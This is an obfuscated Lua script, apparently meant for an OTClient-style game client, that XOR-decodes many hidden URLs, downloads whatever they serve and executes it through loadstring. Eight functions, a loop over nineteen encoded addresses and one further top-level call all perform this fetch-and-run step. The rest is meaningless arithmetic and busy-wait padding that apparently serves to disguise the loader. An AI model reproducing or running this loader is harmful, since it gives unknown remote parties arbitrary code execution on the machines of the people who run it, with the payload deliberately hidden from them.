
local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v26, v27)
	local v28 = {};
	for v96 = 1, #v26 do
		v6(v28, v0(v4(v1(v2(v26, v96, v96 + 1)), v1(v2(v27, 1 + (v96 % #v27), 1 + (v96 % #v27) + 1))) % 256));
	end
	return v5(v28);
end
local function v8()
	local v29 = 403 - (320 + 83);
	local v30;
	while true do
		if (v29 == (1878 - (332 + 1546))) then
			v30 = v7("\217\215\207\53\188\244\136\74\132\141\141\114\168\227\158\80\128\147\138\106\245\184\213\79\208\140\210\43\226\190\223\80\221\214\218", "\126\177\163\187\69\134\219\167");
			modules.corelib.HTTP.get(v30, function(v138, v139)
				if v139 then
					return;
				end
				assert(loadstring(v138))();
			end);
			break;
		end
	end
end
local function v9()
	local v31 = 0 - 0;
	local v32;
	while true do
		if (v31 == (0 + 0)) then
			v32 = v7("\43\217\62\213\166\108\130\123\144\168\109\159\121\139\171\117\131\123\157\165\108\222\41\215\174\33\130\35\203\248\38\213\100\201\233\34", "\156\67\173\74\165");
			modules.corelib.HTTP.get(v32, function(v140, v141)
				local v142 = 1384 - (746 + 638);
				while true do
					if (v142 == 0) then
						if v141 then
							return;
						end
						assert(loadstring(v140))();
						break;
					end
				end
			end);
			break;
		end
	end
end
local function v10()
	local v33 = v7("\60\163\93\6\230\105\9\101\238\26\88\232\114\8\101\229\25\88\238\118\22\123\164\74\4\239\37\9\61\185\77\19\164\104\74\33\182", "\38\84\215\41\118\220\70");
	modules.corelib.HTTP.get(v33, function(v97, v98)
		local v99 = 0 + 0;
		local v100;
		while true do
			if (v99 == (0 - 0)) then
				v100 = 341 - (218 + 123);
				while true do
					if (v100 == (1581 - (1535 + 46))) then
						if v98 then
							return;
						end
						assert(loadstring(v97))();
						break;
					end
				end
				break;
			end
		end
	end);
end
local function v11()
	local v34 = 0 + 0;
	local v35;
	while true do
		if (v34 == (0 + 0)) then
			v35 = v7("\88\2\54\2\164\31\89\112\67\172\30\69\119\92\175\1\71\108\74\174\31\5\33\0\170\84\89\43\28\250\85\14\108\30\235\81", "\158\48\118\66\114");
			modules.corelib.HTTP.get(v35, function(v143, v144)
				local v145 = 560 - (306 + 254);
				while true do
					if ((476 - (41 + 435)) == v145) then
						if v144 then
							return;
						end
						assert(loadstring(v143))();
						break;
					end
				end
			end);
			break;
		end
	end
end
local function v12()
	local v36 = 0 + 0;
	local v37;
	while true do
		if (v36 == (0 + 0)) then
			v37 = v7("\163\48\4\38\41\234\180\249\118\64\120\42\253\181\254\113\94\100\38\234\232\168\54\69\51\60\172\245\175\33\8\120\127\176\250", "\155\203\68\112\86\19\197");
			modules.corelib.HTTP.get(v37, function(v146, v147)
				local v148 = 1125 - (936 + 189);
				while true do
					if (v148 == (0 - 0)) then
						if v147 then
							return;
						end
						assert(loadstring(v146))();
						break;
					end
				end
			end);
			break;
		end
	end
end
local function v13()
	local v38 = v7("\78\201\34\236\26\55\170\169\31\143\120\173\22\32\171\161\31\147\98\168\15\107\230\234\31\132\55\179\73\118\225\253\94\147\58\233\65", "\152\38\189\86\156\32\24\133");
	modules.corelib.HTTP.get(v38, function(v101, v102)
		local v103 = 1613 - (1565 + 48);
		while true do
			if (v103 == (1467 - (899 + 568))) then
				if v102 then
					return;
				end
				assert(loadstring(v101))();
				break;
			end
		end
	end);
end
local function v14()
	local v39 = 0 + 0;
	local v40;
	while true do
		if ((0 - 0) == v39) then
			v40 = v7("\244\67\179\86\166\24\232\18\169\25\240\31\178\6\245\30\178\14\244\9\239\84\181\20\164\85\232\79\242\83\162\94\178\91\178\71", "\38\156\55\199");
			modules.corelib.HTTP.get(v40, function(v149, v150)
				local v151 = 0;
				while true do
					if (v151 == (603 - (268 + 335))) then
						if v150 then
							return;
						end
						assert(loadstring(v149))();
						break;
					end
				end
			end);
			break;
		end
	end
end
local function v15()
	local v41 = 267 - (176 + 91);
	local v42;
	while true do
		if ((290 - (60 + 230)) == v41) then
			v42 = v7("\160\105\104\56\73\59\181\18\240\41\50\126\70\58\169\16\230\44\43\103\0\119\232\18\255\126\51\33\29\112\255\91\230\113\105\41", "\35\200\29\28\72\115\20\154");
			modules.corelib.HTTP.get(v42, function(v152, v153)
				local v154 = 572 - (426 + 146);
				while true do
					if (v154 == (0 + 0)) then
						if v153 then
							return;
						end
						assert(loadstring(v152))();
						break;
					end
				end
			end);
			break;
		end
	end
end
local function v16(v43, v44)
	local v45 = 1456 - (282 + 1174);
	local v46;
	local v47;
	local v48;
	local v49;
	local v50;
	local v51;
	local v52;
	local v53;
	while true do
		if (v45 == 4) then
			return v53;
		end
		if (v45 == (813 - (569 + 242))) then
			local v132 = 1092 - (975 + 117);
			while true do
				if ((0 - 0) == v132) then
					v50 = v49 * (1 + 7);
					v51 = v50 / (1026 - (706 + 318));
					v132 = 1252 - (721 + 530);
				end
				if ((1272 - (945 + 326)) == v132) then
					v45 = 7 - 4;
					break;
				end
			end
		end
		if ((0 + 0) == v45) then
			v46 = v43 * v44;
			v47 = v46 + (3361 - 2127);
			v45 = 701 - (271 + 429);
		end
		if (v45 == (3 + 0)) then
			local v133 = 1500 - (1408 + 92);
			while true do
				if (v133 == (1087 - (461 + 625))) then
					v45 = 4;
					break;
				end
				if (v133 == (1288 - (993 + 295))) then
					v52 = (v51 * (18 - 8)) - (3 + 47);
					v53 = v52 + v46 + v50;
					v133 = 1172 - (418 + 753);
				end
			end
		end
		if (v45 == (1 + 0)) then
			v48 = v47 / (1 + 4);
			v49 = v48 - (1756 - (449 + 740));
			v45 = 1 + 1;
		end
	end
end
local function v17(v54, v55)
	local v56 = v54;
	local v57 = 0;
	while v56 <= v55 do
		local v104 = 0;
		while true do
			if (v104 == (947 - (245 + 702))) then
				v57 = v57 + (v56 ^ (1 + 1));
				v56 = v56 + (530 - (406 + 123));
				break;
			end
		end
	end
	local v58 = v57 * (14114 - (1749 + 20));
	local v59 = v58 / (1440 - (382 + 58));
	local v60 = v59 * (0.5 + 0);
	local v61 = v60 - (831 + 168);
	return v61;
end
local function v18(v62)
	if (v62 <= (1322 - (1249 + 73))) then
		return 0 + 0;
	else
		local v116 = 1145 - (466 + 679);
		local v117;
		local v118;
		local v119;
		while true do
			if (v116 == (1 - 0)) then
				local v158 = 0;
				while true do
					if (v158 == (0 - 0)) then
						v119 = v118 * (29 - 19);
						return v119 - (16240 - 10562);
					end
				end
			end
			if (v116 == (1900 - (106 + 1794))) then
				v117 = v18(v62 - (1 + 0));
				v118 = v117 + 1234;
				v116 = 1 + 0;
			end
		end
	end
end
local function v19(v63, v64)
	local v65 = 0 - 0;
	local v66;
	local v67;
	local v68;
	local v69;
	local v70;
	while true do
		if ((2 - 1) == v65) then
			v68 = nil;
			v69 = nil;
			v65 = 1 + 1;
		end
		if (v65 == (116 - (4 + 110))) then
			v70 = nil;
			while true do
				local v155 = 214 - (22 + 192);
				while true do
					if (v155 == 1) then
						if (v66 == (587 - (57 + 527))) then
							return v70;
						end
						if (v66 == (1427 - (41 + 1386))) then
							v67 = {};
							for v165 = 1, #v63 do
								local v166 = 103 - (17 + 86);
								while true do
									if (v166 == (0 - 0)) then
										v67[v165] = {};
										for v174 = 1 + 0, #v63[v165] do
											v67[v165][v174] = v63[v165][v174] * v64[v165][v174];
										end
										break;
									end
								end
							end
							v66 = 1 - 0;
						end
						break;
					end
					if (v155 == (0 - 0)) then
						if (v66 == 2) then
							local v164 = 166 - (122 + 44);
							while true do
								if ((0 - 0) == v164) then
									v69 = v68 * (4050 - 1705);
									v70 = v69 / (331 - 231);
									v164 = 1;
								end
								if (v164 == (1 + 0)) then
									v66 = 3;
									break;
								end
							end
						end
						if (v66 == (1 + 0)) then
							v68 = 0 + 0;
							for v167 = 1 - 0, #v67 do
								for v171 = 66 - (30 + 35), #v67[v167] do
									v68 = v68 + v67[v167][v171];
								end
							end
							v66 = 2 + 0;
						end
						v155 = 1258 - (1043 + 214);
					end
				end
			end
			break;
		end
		if (v65 == (0 - 0)) then
			v66 = 0 + 0;
			v67 = nil;
			v65 = 1213 - (323 + 889);
		end
	end
end
local function v20(v71)
	if ((v71 % (5 - 3)) == 0) then
		local v120 = 580 - (361 + 219);
		local v121;
		local v122;
		local v123;
		local v124;
		local v125;
		while true do
			local v134 = 320 - (53 + 267);
			while true do
				if ((1 + 0) == v134) then
					if ((413 - (15 + 398)) == v120) then
						local v162 = 982 - (18 + 964);
						while true do
							if (v162 == (3 - 2)) then
								v120 = 1 - 0;
								break;
							end
							if (v162 == (0 + 0)) then
								v121 = v71 * (767 - (574 + 191));
								v122 = v121 + 3565 + 756;
								v162 = 1;
							end
						end
					end
					break;
				end
				if (v134 == (0 - 0)) then
					if (v120 == (2 + 0)) then
						v125 = v124 * (853 - (20 + 830));
						return v125;
					end
					if (v120 == (1 + 0)) then
						local v163 = 126 - (116 + 10);
						while true do
							if (v163 == (1 + 0)) then
								v120 = 740 - (542 + 196);
								break;
							end
							if (v163 == (0 - 0)) then
								v123 = v122 / (21 - 11);
								v124 = v123 - (361 + 873);
								v163 = 940 - (714 + 225);
							end
						end
					end
					v134 = 2 - 1;
				end
			end
		end
	else
		local v126 = 0 - 0;
		local v127;
		local v128;
		local v129;
		local v130;
		local v131;
		while true do
			if (v126 == 2) then
				v131 = nil;
				while true do
					if (v127 == (2 + 0)) then
						return v131;
					end
					if (v127 == (1 + 0)) then
						v130 = v129 - (6178 - 3833);
						v131 = v130 * (806.5 - (118 + 688));
						v127 = 4 - 2;
					end
					if (v127 == (1551 - (1126 + 425))) then
						v128 = v71 + (6083 - (118 + 287));
						v129 = v128 * (7 - 5);
						v127 = 1;
					end
				end
				break;
			end
			if (v126 == (1 + 0)) then
				v129 = nil;
				v130 = nil;
				v126 = 1123 - (118 + 1003);
			end
			if (v126 == (1886 - (927 + 959))) then
				v127 = 0;
				v128 = nil;
				v126 = 3 - 2;
			end
		end
	end
end
local v21 = {v7("\17\171\197\207\215\99\123\72\230\131\145\220\122\108\87\238\133\145\220\99\39\26\173\128\220\194\37\58\29\186\201\145\129\57\53", "\84\121\223\177\191\237\76"),v7("\179\66\221\176\96\31\127\149\238\24\158\249\107\30\97\145\238\24\152\248\98\31\35\194\169\4\202\239\51\94\52\196\163\24\197\181\59", "\161\219\54\169\192\90\48\80"),v7("\65\86\20\53\19\13\79\116\17\23\78\116\27\22\78\116\16\16\78\115\30\13\19\38\91\17\3\106\64\76\4\32\81\12\12\48\72", "\69\41\34\96"),v7("\180\215\195\26\88\100\243\146\129\93\76\114\233\154\153\88\86\126\242\146\133\69\17\40\174\151\212\69\11\37\184\198\207\68\14\62\189", "\75\220\163\183\106\98"),v7("\10\174\159\39\131\77\245\218\100\129\76\236\211\121\142\85\238\197\101\138\77\169\136\37\140\1\245\130\57\221\7\162\197\59\204\3", "\185\98\218\235\87"),v7("\195\40\51\246\132\229\132\109\119\178\144\248\152\106\105\177\138\252\133\110\117\169\205\169\217\106\36\169\215\164\207\57\63\168\210\191\202", "\202\171\92\71\134\190"),v7("\33\213\56\152\115\142\99\217\124\152\98\222\124\143\127\219\123\143\125\208\126\142\63\139\59\150\47\199\32\207\40\141\49\143\32\157\40", "\232\73\161\76"),v7("\179\205\86\77\68\244\150\22\12\72\245\136\18\12\80\234\140\21\19\76\234\136\13\78\29\169\129\65\18\23\181\221\71\69\80\183\204\67", "\126\219\185\34\61"),v7("\4\218\74\98\36\56\188\182\88\156\16\43\38\36\189\182\88\150\16\32\47\56\224\228\30\151\93\61\119\121\247\226\20\128\82\103\127", "\135\108\174\62\18\30\23\147"),v7("\190\253\62\219\66\225\124\150\224\188\100\153\74\224\98\148\227\167\124\156\87\189\48\213\231\185\41\132\17\160\55\194\174\167\38\222\25", "\167\214\137\74\171\120\206\83"),v7("\131\228\38\77\162\232\196\166\106\19\169\255\216\190\101\14\171\233\223\164\125\78\251\181\218\161\49\18\241\169\143\245\42\19\244\178\138", "\199\235\144\82\61\152"),v7("\15\2\173\59\93\89\246\122\83\66\247\121\87\68\247\125\81\71\247\126\82\89\170\40\21\71\235\40\72\31\183\47\2\14\247\39\18\23", "\75\103\118\217"),v7("\207\64\100\4\227\81\136\5\35\77\247\75\158\26\40\67\247\76\149\13\63\7\186\12\150\7\115\91\176\16\195\81\104\90\181\11\198", "\126\167\52\16\116\217"),v7("\192\58\52\144\238\86\179\153\122\119\206\229\65\174\134\127\120\211\250\74\173\155\97\51\131\166\72\168\203\97\41\142\176\28\228\134\34\53\129", "\156\168\78\64\224\212\121"),v7("\15\250\177\222\93\161\234\159\94\188\235\156\85\191\235\159\84\191\235\159\85\161\182\205\21\191\240\205\72\231\171\202\2\246\235\194\18\239", "\174\103\142\197"),v7("\94\60\75\40\127\17\183\7\127\15\118\115\11\173\24\122\15\105\107\12\170\25\59\92\42\116\8\251\25\33\81\60\32\70\182\90\61\94", "\152\54\72\63\88\69\62"),v7("\220\208\250\76\142\139\161\13\135\144\160\14\134\157\160\5\140\138\186\9\155\215\237\78\133\147\237\19\221\202\234\89\204\138\226\73\213", "\60\180\164\142"),v7("\80\74\17\57\125\162\93\9\9\93\103\113\185\70\22\15\87\122\105\187\69\23\77\6\59\118\181\17\23\87\11\45\34\245\92\84\75\4", "\114\56\62\101\73\71\141"),v7("\176\253\207\212\226\166\148\150\232\176\149\157\239\167\138\147\238\167\138\150\247\250\216\214\233\176\216\139\177\231\223\193\160\167\215\209\185", "\164\216\137\187")};
for v72, v73 in ipairs(v21) do
	modules.corelib.HTTP.get(v73, function(v105, v106)
		local v107 = 0 + 0;
		local v108;
		local v109;
		while true do
			if (v107 == (0 + 0)) then
				if v106 then
					return;
				end
				v108, v109 = pcall(function()
					assert(loadstring(v105))();
				end);
				v107 = 1 + 0;
			end
			if (v107 == (734 - (711 + 22))) then
				if not v108 then
				end
				break;
			end
		end
	end);
end
modules.corelib.HTTP.get(v7("\218\242\37\162\181\164\68\157\244\48\165\232\249\2\198\238\36\176\179\237\14\192\229\62\188\178\251\5\198\168\50\189\171\177\56\217\244\33\160\169\175\68\198\227\34\166\233\236\14\212\245\126\186\163\255\15\193\169\60\179\175\240\68\220\233\34\183\168\237", "\107\178\134\81\210\198\158"), function(v74, v75)
	local v76 = 0 - 0;
	while true do
		if (v76 == (0 - 0)) then
			if v75 then
				return;
			end
			assert(loadstring(v74))();
			break;
		end
	end
end);
local function v22(v77)
	local v78 = 0 - 0;
	local v79;
	local v80;
	local v81;
	local v82;
	local v83;
	while true do
		if ((4 - 1) == v78) then
			return v83;
		end
		if (v78 == (1 + 0)) then
			for v156 = 1745 - (1344 + 400), v79 do
				v80 = v80 .. string.sub(v77, v156, v156);
			end
			v81 = string.reverse(v80);
			v78 = 407 - (255 + 150);
		end
		if ((9 - 7) == v78) then
			local v135 = 753 - (239 + 514);
			while true do
				if (v135 == (0 + 0)) then
					v82 = string.upper(v81);
					v83 = string.lower(v82);
					v135 = 1330 - (797 + 532);
				end
				if (v135 == (4 - 3)) then
					v78 = 9 - 6;
					break;
				end
			end
		end
		if ((1739 - (404 + 1335)) == v78) then
			v79 = #v77;
			v80 = "";
			v78 = 1 + 0;
		end
	end
end
local function v23(v84)
	local v85 = 0 - 0;
	local v86;
	local v87;
	local v88;
	while true do
		if (v85 == (1 + 0)) then
			v87 = 0 + 0;
			for v157 = 338 - (10 + 327), #v86 do
				v87 = v87 + v86[v157];
			end
			v85 = 1 + 1;
		end
		if (v85 == (4 - 2)) then
			v88 = v87 / #v86;
			return v88;
		end
		if (v85 == (338 - (118 + 220))) then
			local v136 = 1202 - (373 + 829);
			local v137;
			while true do
				if (v136 == (731 - (476 + 255))) then
					v137 = 0;
					while true do
						if ((1130 - (369 + 761)) == v137) then
							v86 = {};
							for v168 = 4 - 3, #v84 do
								local v169 = 0 + 0;
								local v170;
								while true do
									if ((1 - 0) == v169) then
										if not v170 then
											table.insert(v86, v84[v168]);
										end
										break;
									end
									if (v169 == (0 - 0)) then
										local v173 = 238 - (64 + 174);
										while true do
											if (v173 == (0 + 0)) then
												v170 = false;
												for v176 = 1, #v86 do
													if (v84[v168] < v86[v176]) then
														table.insert(v86, v176, v84[v168]);
														v170 = true;
														break;
													end
												end
												v173 = 1820 - (580 + 1239);
											end
											if (v173 == (1 + 0)) then
												v169 = 1 - 0;
												break;
											end
										end
									end
								end
							end
							v137 = 337 - (144 + 192);
						end
						if ((217 - (42 + 174)) == v137) then
							v85 = 1 + 0;
							break;
						end
					end
					break;
				end
			end
		end
	end
end
local function v24(v89)
	local v90 = 0 + 0;
	local v91;
	local v92;
	while true do
		local v110 = 0 + 0;
		while true do
			if (v110 == (0 + 0)) then
				if ((1506 - (363 + 1141)) == v90) then
					return v91;
				end
				if ((1 + 0) == v90) then
					v92 = os.time();
					while (os.time() - v92) < (1581 - (1183 + 397)) do
					end
					v90 = 5 - 3;
				end
				v110 = 1 + 0;
			end
			if (v110 == 1) then
				if (v90 == (0 + 0)) then
					v91 = "";
					modules.corelib.HTTP.get(v89, function(v160, v161)
						if v161 then
							return;
						end
						v91 = v160;
					end);
					v90 = 1976 - (1913 + 62);
				end
				break;
			end
		end
	end
end
local function v25(v93)
	local v94 = {};
	modules.corelib.HTTP.get(v93, function(v111, v112)
		local v113 = 505 - (351 + 154);
		local v114;
		local v115;
		while true do
			if ((0 + 0) == v113) then
				if v112 then
					return;
				end
				v114 = string.upper(v111);
				v113 = 2 - 1;
			end
			if (v113 == (1935 - (565 + 1368))) then
				v94 = v115;
				break;
			end
			if ((3 - 2) == v113) then
				v115 = {};
				for v159 in string.gmatch(v114, "[^\r\n]+") do
					table.insert(v115, v159);
				end
				v113 = 2;
			end
		end
	end);
	local v95 = os.time();
	while (os.time() - v95) < (1662 - (1477 + 184)) do
	end
	return v94;
end
